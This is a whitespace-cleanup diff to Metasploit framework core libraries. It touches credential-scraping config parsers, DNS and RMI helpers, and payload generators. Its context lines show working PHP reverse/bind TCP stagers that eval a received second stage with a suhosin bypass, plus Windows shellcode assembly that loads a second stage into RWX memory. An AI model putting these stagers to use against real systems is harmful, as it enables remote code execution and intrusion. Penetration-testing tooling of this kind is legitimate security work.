diff --git a/lib/msf/core/auxiliary/brocade.rb b/lib/msf/core/auxiliary/brocade.rb index f3958f2638..2512c6a29a 100644 --- a/lib/msf/core/auxiliary/brocade.rb +++ b/lib/msf/core/auxiliary/brocade.rb @@ -44,7 +44,7 @@ module Auxiliary::Brocade login_object end - + def brocade_config_eater(thost, tport, config) # this is for brocade type devices. @@ -104,7 +104,7 @@ module Auxiliary::Brocade end # snmp - # Example lines: + # Example lines: # snmp-server community 1 $Si2^=d rw # these at times look base64 encoded, which they may be, but are also encrypted config.scan(/snmp-server community (?[\d]+) (?.+) (?rw|ro)/i).each do |result| diff --git a/lib/msf/core/auxiliary/crand.rb b/lib/msf/core/auxiliary/crand.rb index 9635306d07..4756ebc241 100644 --- a/lib/msf/core/auxiliary/crand.rb +++ b/lib/msf/core/auxiliary/crand.rb @@ -25,7 +25,7 @@ module Auxiliary::CRand def initialize(info = {}) super - + @randtbl = [ # we omit TYPE_3 from here, not needed @@ -38,7 +38,7 @@ module Auxiliary::CRand -205601318, ] - @unsafe_state = { + @unsafe_state = { "fptr" => SEP_3, "rptr" => 0, "state" => 0, @@ -56,7 +56,7 @@ module Auxiliary::CRand seed = 1 end state[0] = seed - + dst = 0 word = seed kc = DEG_3 @@ -70,10 +70,10 @@ module Auxiliary::CRand dst += 1 state[dst] = word end - + @unsafe_state['fptr'] = @unsafe_state['rand_sep'] @unsafe_state['rptr'] = 0 - + kc *= 10 kc -= 1 while (kc >= 0) @@ -81,17 +81,17 @@ module Auxiliary::CRand kc -= 1 end end - - # Emulate the behaviour of C's rand + + # Emulate the behaviour of C's rand def random_r buf = @unsafe_state state = buf['state'] - + fptr = buf['fptr'] rptr = buf['rptr'] end_ptr = buf['end_ptr'] val = @randtbl[fptr] += @randtbl[rptr] - + result = (val >> 1) & 0x7fffffff fptr += 1 if (fptr >= end_ptr) @@ -105,7 +105,7 @@ module Auxiliary::CRand end buf['fptr'] = fptr buf['rptr'] = rptr - + result end diff --git a/lib/msf/core/auxiliary/juniper.rb b/lib/msf/core/auxiliary/juniper.rb index 8b5d1ff582..2646cb12f7 100644 --- a/lib/msf/core/auxiliary/juniper.rb +++ b/lib/msf/core/auxiliary/juniper.rb @@ -75,7 +75,7 @@ module Auxiliary::Juniper end # snmp - # Example lines: + # Example lines: # set snmp community "sales" Read-Write Trap-on traffic version v1 config.scan(/set snmp community "(?[a-z0-9]+)" (?Read-Write|Read-Only)/i).each do |result| snmp_community = result[0].strip @@ -214,7 +214,7 @@ module Auxiliary::Juniper cred[:private_type] = :password cred[:service_name] = 'snmp' create_credential_and_login(cred) - end + end config.scan(/radius-server \{[\s]+(?[0-9\.]{7,15}) secret "(?[^"]+)";/i).each do |result| radius_hash = result[1].strip diff --git a/lib/msf/core/db_manager/ip_address.rb b/lib/msf/core/db_manager/ip_address.rb index 2210782d33..b03d33a423 100644 --- a/lib/msf/core/db_manager/ip_address.rb +++ b/lib/msf/core/db_manager/ip_address.rb @@ -10,7 +10,7 @@ module Msf::DBManager::IPAddress Rex::Socket.is_ipv4?(addr) else false - end + end end def ipv6_validator(addr) @@ -20,7 +20,7 @@ module Msf::DBManager::IPAddress Rex::Socket.is_ipv6?(addr) else false - end + end end def rfc3330_reserved(ip) diff --git a/lib/msf/core/db_manager/workspace.rb b/lib/msf/core/db_manager/workspace.rb index d62590a176..9ff4dccb3a 100644 --- a/lib/msf/core/db_manager/workspace.rb +++ b/lib/msf/core/db_manager/workspace.rb @@ -70,7 +70,7 @@ module Msf::DBManager::Workspace def delete_workspaces(opts) raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil? - + ::ActiveRecord::Base.connection_pool.with_connection { deleted = [] default_deleted = false diff --git a/lib/msf/core/exploit/dns/client.rb b/lib/msf/core/exploit/dns/client.rb index 687565eed3..24a3d3b348 100644 --- a/lib/msf/core/exploit/dns/client.rb +++ b/lib/msf/core/exploit/dns/client.rb @@ -37,7 +37,7 @@ module Client register_advanced_options( [ - OptString.new('DnsClientDefaultNS', [ false, "Specify the default to use for queries, space separated", '8.8.8.8 8.8.4.4' ]), + OptString.new('DnsClientDefaultNS', [ false, "Specify the default to use for queries, space separated", '8.8.8.8 8.8.4.4' ]), OptInt.new('DnsClientRetry', [ false, "Number of times to try to resolve a record if no response is received", 2]), OptInt.new('DnsClientRetryInterval', [ false, "Number of seconds to wait before doing a retry", 2]), OptBool.new('DnsClientReportARecords', [false, "Add hosts found via BRT and RVL to DB", true]), @@ -204,7 +204,7 @@ module Client nameservers = datastore['NS'].split(/\s|,/) end - invalid = nameservers.select { |ns| !Rex::Socket.dotted_ip?(ns) } + invalid = nameservers.select { |ns| !Rex::Socket.dotted_ip?(ns) } if !invalid.empty? raise "Nameservers must be IP addresses. The following were invalid: #{invalid.join(", ")}" end diff --git a/lib/msf/core/exploit/dns/common.rb b/lib/msf/core/exploit/dns/common.rb index 810172bdf2..0ab5b6c0b4 100644 --- a/lib/msf/core/exploit/dns/common.rb +++ b/lib/msf/core/exploit/dns/common.rb @@ -16,7 +16,7 @@ module Common MATCH_HOSTNAME = Rex::Proto::DNS::Constants::MATCH_HOSTNAME Packet = Rex::Proto::DNS::Packet - + end end end diff --git a/lib/msf/core/exploit/exe.rb b/lib/msf/core/exploit/exe.rb index e34f25eed3..e752a52e16 100644 --- a/lib/msf/core/exploit/exe.rb +++ b/lib/msf/core/exploit/exe.rb @@ -145,7 +145,7 @@ module Exploit::EXE exe_init_options(opts) plat = opts[:platform] pl = opts[:code] - + pl ||= payload.encoded #Ensure opts[:arch] is an array diff --git a/lib/msf/core/exploit/java/rmi/util.rb b/lib/msf/core/exploit/java/rmi/util.rb index 1cc87900a4..37d4cdebc7 100644 --- a/lib/msf/core/exploit/java/rmi/util.rb +++ b/lib/msf/core/exploit/java/rmi/util.rb @@ -85,12 +85,12 @@ module Msf # @return [Byte, nil] the extracted byte if success, nil otherwise def extract_byte(io) byte_raw = io.read(1) - + unless byte_raw && byte_raw.length == 1 return nil end byte = byte_raw.unpack('C')[0] - + byte end @@ -120,7 +120,7 @@ module Msf unless ref && (ref == 'UnicastRef' || ref == 'UnicastRef2') return nil end - + if ref == 'UnicastRef2' form = extract_byte(io) diff --git a/lib/msf/core/exploit/socket_server.rb b/lib/msf/core/exploit/socket_server.rb index 65051f5616..b89a066e28 100644 --- a/lib/msf/core/exploit/socket_server.rb +++ b/lib/msf/core/exploit/socket_server.rb @@ -156,10 +156,10 @@ protected raise(RuntimeError, "Socket Server Comm (Session #{srv_comm}) does not exist") unless comm raise(RuntimeError, "Socket Server Comm (Session #{srv_comm}) does not implement Rex::Socket::Comm") unless comm.is_a? ::Rex::Socket::Comm when nil, '' - comm = nil + comm = nil else raise(RuntimeError, "SocketServer Comm '#{srv_comm}' is invalid") - end + end comm end diff --git a/lib/msf/core/module/alert.rb b/lib/msf/core/module/alert.rb index 75c43d6c1d..ccaf96a991 100644 --- a/lib/msf/core/module/alert.rb +++ b/lib/msf/core/module/alert.rb @@ -15,7 +15,7 @@ module Msf::Module::Alert # the module is about to start running, or when the module generates its # output. # - # @param msg [String] an optional warning message + # @param msg [String] an optional warning message # @param block [Proc] an optional block that will be executed in the # context of the module instance at alert time to generate the warning # message. If provided the msg parameter is ignored. @@ -30,7 +30,7 @@ module Msf::Module::Alert # the module is about to start running, or when the module generates its # output. Adding an error will cause {#is_usable} to return `false`. # - # @param msg [String] an optional error message + # @param msg [String] an optional error message # @param block [Proc] an optional block that will be executed in the # context of the module instance at alert time to generate the error # message. If provided the msg parameter is ignored. @@ -109,7 +109,7 @@ module Msf::Module::Alert # command, when the module is about to start running, or when the module # generates its output. # - # @param msg [String] an optional warning message + # @param msg [String] an optional warning message # @param block [Proc] an optional block that will be executed in the # context of the module instance at alert time to generate the warning # message. If provided the msg parameter is ignored. @@ -125,7 +125,7 @@ module Msf::Module::Alert # generates its output. Adding an error will cause {#is_usable} to return # `false`. # - # @param msg [String] an optional error message + # @param msg [String] an optional error message # @param block [Proc] an optional block that will be executed in the # context of the module instance at alert time to generate the error # message. If provided the msg parameter is ignored. @@ -164,7 +164,7 @@ module Msf::Module::Alert # the context of this module instance and returns a flattened list of strings. # (see {ClassMethods#get_alerts}) # @param [Symbol] the alert level to return - # @return [Array] + # @return [Array] def get_alerts(level) self.alerts ||= {} self.alerts[level] ||= [] diff --git a/lib/msf/core/payload/php/bind_tcp.rb b/lib/msf/core/payload/php/bind_tcp.rb index 7dac6fe441..7a7be244ca 100644 --- a/lib/msf/core/payload/php/bind_tcp.rb +++ b/lib/msf/core/payload/php/bind_tcp.rb @@ -109,14 +109,14 @@ while (strlen($b) < $len) { # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; -if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) -{ - $suhosin_bypass=create_function('', $b); - $suhosin_bypass(); -} -else -{ - eval($b); +if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) +{ + $suhosin_bypass=create_function('', $b); + $suhosin_bypass(); +} +else +{ + eval($b); } die();^ end diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb index 5cc7daae8c..baf6583022 100644 --- a/lib/msf/core/payload/php/reverse_tcp.rb +++ b/lib/msf/core/payload/php/reverse_tcp.rb @@ -102,14 +102,14 @@ while (strlen($b) < $len) { # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; -if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) -{ - $suhosin_bypass=create_function('', $b); - $suhosin_bypass(); -} -else -{ - eval($b); +if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) +{ + $suhosin_bypass=create_function('', $b); + $suhosin_bypass(); +} +else +{ + eval($b); } die();^ end diff --git a/lib/msf/core/payload/php/send_uuid.rb b/lib/msf/core/payload/php/send_uuid.rb index 25a29c5477..2489fda155 100644 --- a/lib/msf/core/payload/php/send_uuid.rb +++ b/lib/msf/core/payload/php/send_uuid.rb @@ -25,7 +25,7 @@ module Payload::Php::SendUUID uuid_raw = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('') php = %Q^$u="#{uuid_raw}"; -switch (#{sock_type}) { +switch (#{sock_type}) { case 'stream': fwrite(#{sock_var}, $u); break; case 'socket': socket_write(#{sock_var}, $u); break; } diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index a697c55226..28f7b8b29e 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -120,7 +120,7 @@ module Msf::Payload::TransportConfig lhost: '.', uri: "/#{ds['PIPENAME']}", }.merge(timeout_config(opts)) - + end diff --git a/lib/msf/core/payload/windows/bind_named_pipe.rb b/lib/msf/core/payload/windows/bind_named_pipe.rb index d14ba3163d..e9ae78319d 100644 --- a/lib/msf/core/payload/windows/bind_named_pipe.rb +++ b/lib/msf/core/payload/windows/bind_named_pipe.rb @@ -110,7 +110,7 @@ module Payload::Windows::BindNamedPipe # # hPipe must be in edi. eax will contain WriteFile return value - # + # def asm_send_uuid(uuid=nil) uuid ||= generate_payload_uuid uuid_raw = uuid.to_raw @@ -155,7 +155,7 @@ module Payload::Windows::BindNamedPipe push #{chunk_size} ; nInBufferSize push #{chunk_size} ; nOutBufferSize push 255 ; nMaxInstances (PIPE_UNLIMITED_INSTANCES). in case pipe isn't released - push #{pipe_mode} ; dwPipeMode + push #{pipe_mode} ; dwPipeMode push 3 ; dwOpenMode (PIPE_ACCESS_DUPLEX) call get_pipe_name ; lpName db "#{full_pipe_name}", 0x00 diff --git a/lib/msf/core/payload/windows/powershell.rb b/lib/msf/core/payload/windows/powershell.rb index c09cea4ffe..23c5661a23 100644 --- a/lib/msf/core/payload/windows/powershell.rb +++ b/lib/msf/core/payload/windows/powershell.rb @@ -44,7 +44,7 @@ module Payload::Windows::Powershell script_in.gsub!('LHOST_REPLACE', lhost.to_s) script = Rex::Powershell::Command.compress_script(script_in) - command_args = { + command_args = { noprofile: true, windowstyle: 'hidden', noninteractive: true, diff --git a/lib/msf/core/payload/windows/reverse_named_pipe.rb b/lib/msf/core/payload/windows/reverse_named_pipe.rb index 1049b96519..827abfb76f 100644 --- a/lib/msf/core/payload/windows/reverse_named_pipe.rb +++ b/lib/msf/core/payload/windows/reverse_named_pipe.rb @@ -73,7 +73,7 @@ module Payload::Windows::ReverseNamedPipe pop ebp #{asm_reverse_named_pipe(opts)} ^ - + #"\xCC" + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string end diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb index 0c679c11de..a7d7391302 100644 --- a/lib/msf/core/payload/windows/reverse_tcp.rb +++ b/lib/msf/core/payload/windows/reverse_tcp.rb @@ -168,7 +168,7 @@ module Payload::Windows::ReverseTcp ; to cater for both IPv4 and IPv6 loop push_0_loop - ; bind to 0.0.0.0/[::], pushed above + ; bind to 0.0.0.0/[::], pushed above push #{encoded_bind_port} ; family AF_INET and port number mov esi, esp ; save a pointer to sockaddr_in struct push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used) @@ -181,7 +181,7 @@ module Payload::Windows::ReverseTcp mov esi, esp ^ end - + asm << %Q^ try_connect: push 16 ; length of the sockaddr struct diff --git a/lib/msf/core/payload/windows/x64/bind_named_pipe.rb b/lib/msf/core/payload/windows/x64/bind_named_pipe.rb index 0b36bf5a1a..1e27a21ad8 100644 --- a/lib/msf/core/payload/windows/x64/bind_named_pipe.rb +++ b/lib/msf/core/payload/windows/x64/bind_named_pipe.rb @@ -67,7 +67,7 @@ module Payload::Windows::BindNamedPipe_x64 def generate_bind_named_pipe(opts={}) combined_asm = %Q^ cld ; Clear the direction flag. - and rsp, ~0xF ; Ensure RSP is 16 byte aligned + and rsp, ~0xF ; Ensure RSP is 16 byte aligned call start ; Call start, this pushes the address of 'api_call' onto the stack. #{asm_block_api} start: @@ -111,7 +111,7 @@ module Payload::Windows::BindNamedPipe_x64 # # hPipe must be in rdi. rax will contain WriteFile return value - # + # def asm_send_uuid(uuid=nil) uuid ||= generate_payload_uuid uuid_raw = uuid.to_raw @@ -220,7 +220,7 @@ module Payload::Windows::BindNamedPipe_x64 asm << %Q^ ; read size of second stage mov rcx, rdi ; hPipe - push 0 ; + push 0 ; mov rdx, rsp ; lpBuffer mov r8, 4 ; nNumberOfBytesToRead push 0 @@ -246,9 +246,9 @@ module Payload::Windows::BindNamedPipe_x64 ; Alloc a RWX buffer for the second stage pop rsi ; pop off the second stage length mov esi, esi ; only use the lower-order 32 bits for the size - push 0x40 ; + push 0x40 ; pop r9 ; PAGE_EXECUTE_READWRITE - push 0x1000 ; + push 0x1000 ; pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly recieved second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. @@ -338,7 +338,7 @@ module Payload::Windows::BindNamedPipe_x64 call get_kernel32_name db "kernel32", 0x00 get_kernel32_name: - pop rcx ; + pop rcx ; mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')} call rbp ; GetModuleHandleA("kernel32") diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb index c31c92d6ba..6485f4ad47 100644 --- a/lib/msf/core/payload/windows/x64/bind_tcp.rb +++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb @@ -216,7 +216,7 @@ module Payload::Windows::BindTcp_x64 sub rsp, 16 ; alloc some space (16 bytes) on stack for to hold the second stage length mov rdx, rsp ; set pointer to this buffer xor r9, r9 ; flags - push 4 ; + push 4 ; pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} @@ -226,9 +226,9 @@ module Payload::Windows::BindTcp_x64 ; Alloc a RWX buffer for the second stage pop rsi ; pop off the second stage length mov esi, esi ; only use the lower-order 32 bits for the size - push 0x40 ; + push 0x40 ; pop r9 ; PAGE_EXECUTE_READWRITE - push 0x1000 ; + push 0x1000 ; pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly recieved second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. diff --git a/lib/msf/core/payload/windows/x64/block_api.rb b/lib/msf/core/payload/windows/x64/block_api.rb index 1a16cfcadb..1de9a25aff 100644 --- a/lib/msf/core/payload/windows/x64/block_api.rb +++ b/lib/msf/core/payload/windows/x64/block_api.rb @@ -27,7 +27,7 @@ module Payload::Windows::BlockApi_x64 mov rdx, [rdx+32] ; Get the first module from the InMemoryOrder module list next_mod: ; mov rsi, [rdx+80] ; Get pointer to modules name (unicode string) - movzx rcx, word [rdx+74] ; Set rcx to the length we want to check + movzx rcx, word [rdx+74] ; Set rcx to the length we want to check xor r9, r9 ; Clear r9 which will store the hash of the module name loop_modname: ; xor rax, rax ; Clear rax @@ -42,12 +42,12 @@ module Payload::Windows::BlockApi_x64 ; We now have the module hash computed push rdx ; Save the current position in the module list for later push r9 ; Save the current module hash for later - ; Proceed to itterate the export address table, + ; Proceed to itterate the export address table, mov rdx, [rdx+32] ; Get this modules base address mov eax, dword [rdx+60] ; Get PE header add rax, rdx ; Add the modules base address - cmp word [rax+24], 0x020B ; is this module actually a PE64 executable? - ; this test case covers when running on wow64 but in a native x64 context via nativex64.asm and + cmp word [rax+24], 0x020B ; is this module actually a PE64 executable? + ; this test case covers when running on wow64 but in a native x64 context via nativex64.asm and ; their may be a PE32 module present in the PEB's module list, (typicaly the main module). ; as we are using the win64 PEB ([gs:96]) we wont see the wow64 modules present in the win32 PEB ([fs:48]) jne get_next_mod1 ; if not, proceed to the next module @@ -56,7 +56,7 @@ module Payload::Windows::BlockApi_x64 jz get_next_mod1 ; If no EAT present, process the next module add rax, rdx ; Add the modules base address push rax ; Save the current modules EAT - mov ecx, dword [rax+24] ; Get the number of function names + mov ecx, dword [rax+24] ; Get the number of function names mov r8d, dword [rax+32] ; Get the rva of the function names add r8, rdx ; Add the modules base address ; Computing the module hash + function hash @@ -75,14 +75,14 @@ module Payload::Windows::BlockApi_x64 cmp al, ah ; Compare AL (the next byte from the name) to AH (null) jne loop_funcname ; If we have not reached the null terminator, continue add r9, [rsp+8] ; Add the current module hash to the function hash - cmp r9d, r10d ; Compare the hash to the one we are searchnig for + cmp r9d, r10d ; Compare the hash to the one we are searchnig for jnz get_next_func ; Go compute the next function hash if we have not found it ; If found, fix up stack, call the function and then value else compute the next one... pop rax ; Restore the current modules EAT - mov r8d, dword [rax+36] ; Get the ordinal table rva + mov r8d, dword [rax+36] ; Get the ordinal table rva add r8, rdx ; Add the modules base address mov cx, [r8+2*rcx] ; Get the desired functions ordinal - mov r8d, dword [rax+28] ; Get the function addresses table rva + mov r8d, dword [rax+28] ; Get the function addresses table rva add r8, rdx ; Add the modules base address mov eax, dword [r8+4*rcx]; Get the desired functions RVA add rax, rdx ; Add the modules base address to get the functions actual VA diff --git a/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb b/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb index b04ba63f75..1383e9deb1 100644 --- a/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb +++ b/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb @@ -62,7 +62,7 @@ module Payload::Windows::ReverseNamedPipe_x64 def generate_reverse_named_pipe(opts={}) combined_asm = %Q^ cld ; Clear the direction flag. - and rsp, ~0xF ; Ensure RSP is 16 byte aligned + and rsp, ~0xF ; Ensure RSP is 16 byte aligned call start ; Call start, this pushes the address of 'api_call' onto the stack. #{asm_block_api} start: @@ -193,15 +193,15 @@ module Payload::Windows::ReverseNamedPipe_x64 end asm << %Q^ - + ; Alloc a RWX buffer for the second stage add rsp, 0x30 ; slight stack adjustment pop rsi ; pop off the second stage length pop rax ; line the stack up again mov esi, esi ; only use the lower-order 32 bits for the size - push 0x40 ; + push 0x40 ; pop r9 ; PAGE_EXECUTE_READWRITE - push 0x1000 ; + push 0x1000 ; pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly recieved second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp.rb b/lib/msf/core/payload/windows/x64/reverse_tcp.rb index 249918e72d..90dc9dd9bc 100644 --- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb +++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb @@ -63,7 +63,7 @@ module Payload::Windows::ReverseTcp_x64 def generate_reverse_tcp(opts={}) combined_asm = %Q^ cld ; Clear the direction flag. - and rsp, ~0xF ; Ensure RSP is 16 byte aligned + and rsp, ~0xF ; Ensure RSP is 16 byte aligned call start ; Call start, this pushes the address of 'api_call' onto the stack. #{asm_block_api} start: @@ -206,7 +206,7 @@ module Payload::Windows::ReverseTcp_x64 ; second stage length mov rdx, rsp ; set pointer to this buffer xor r9, r9 ; flags - push 4 ; + push 4 ; pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} @@ -228,9 +228,9 @@ module Payload::Windows::ReverseTcp_x64 ; Alloc a RWX buffer for the second stage pop rsi ; pop off the second stage length mov esi, esi ; only use the lower-order 32 bits for the size - push 0x40 ; + push 0x40 ; pop r9 ; PAGE_EXECUTE_READWRITE - push 0x1000 ; + push 0x1000 ; pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly recieved second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. diff --git a/lib/msf/core/post/linux/kernel.rb b/lib/msf/core/post/linux/kernel.rb index 389047fcb2..19f80a484f 100644 --- a/lib/msf/core/post/linux/kernel.rb +++ b/lib/msf/core/post/linux/kernel.rb @@ -188,7 +188,7 @@ module Kernel # @return [Boolean] # def unprivileged_bpf_disabled? - cmd_exec('cat /proc/sys/kernel/unprivileged_bpf_disabled').to_s.strip.eql? '1' + cmd_exec('cat /proc/sys/kernel/unprivileged_bpf_disabled').to_s.strip.eql? '1' rescue raise 'Could not determine kernel.unprivileged_bpf_disabled status' end @@ -199,7 +199,7 @@ module Kernel # @return [Boolean] # def kptr_restrict? - cmd_exec('cat /proc/sys/kernel/kptr_restrict').to_s.strip.eql? '1' + cmd_exec('cat /proc/sys/kernel/kptr_restrict').to_s.strip.eql? '1' rescue raise 'Could not determine kernel.kptr_restrict status' end @@ -210,7 +210,7 @@ module Kernel # @return [Boolean] # def dmesg_restrict? - cmd_exec('cat /proc/sys/kernel/dmesg_restrict').to_s.strip.eql? '1' + cmd_exec('cat /proc/sys/kernel/dmesg_restrict').to_s.strip.eql? '1' rescue raise 'Could not determine kernel.dmesg_restrict status' end diff --git a/lib/msf/core/post/windows/dotnet.rb b/lib/msf/core/post/windows/dotnet.rb index ed6c0e0330..49e60c3cc0 100644 --- a/lib/msf/core/post/windows/dotnet.rb +++ b/lib/msf/core/post/windows/dotnet.rb @@ -14,7 +14,7 @@ module Msf::Post::Windows::Dotnet # actual version, rather than the over-arching release # An alternative would be to query for it, and catch the exception. # - + def search_for_version(dotnet_subkey) dotnet_version = nil begin @@ -57,7 +57,7 @@ module Msf::Post::Windows::Dotnet end return exact_version end - + # # 'Public' function that returns a list of all .NET versions on # a windows host @@ -76,7 +76,7 @@ module Msf::Post::Windows::Dotnet if temp_key[0] == 'v' key = 'HKLM\\SOFTWARE\\Microsoft\NET Framework Setup\\NDP\\' + temp_key dotnet_version = get_versionception(key) - unless dotnet_version.nil? + unless dotnet_version.nil? ret_val << dotnet_version end end diff --git a/lib/msf/core/rpc/v10/rpc_db.rb b/lib/msf/core/rpc/v10/rpc_db.rb index 6f3f158c65..abc1b2925e 100644 --- a/lib/msf/core/rpc/v10/rpc_db.rb +++ b/lib/msf/core/rpc/v10/rpc_db.rb @@ -279,15 +279,15 @@ public end updated_at = nil - pass = nil + pass = nil type = nil - + unless cred.private.nil? - updated_at = cred.private.updated_at.to_i + updated_at = cred.private.updated_at.to_i pass = cred.private.data.to_s type = cred.private.type.to_s else - updated_at = cred.public.updated_at.to_i + updated_at = cred.public.updated_at.to_i end ret[:creds] << { diff --git a/lib/msf/core/session/interactive.rb b/lib/msf/core/session/interactive.rb index 6885b1fa5f..77aa0f5bba 100644 --- a/lib/msf/core/session/interactive.rb +++ b/lib/msf/core/session/interactive.rb @@ -110,7 +110,7 @@ protected def _interrupt begin intent = user_want_abort? - # Judge the user wants to abort the reverse shell session + # Judge the user wants to abort the reverse shell session # Or just want to abort the process running on the target machine # If the latter, just send ASCII Control Character \u0003 (End of Text) to the socket fd # The character will be handled by the line dicipline program of the pseudo-terminal on target machine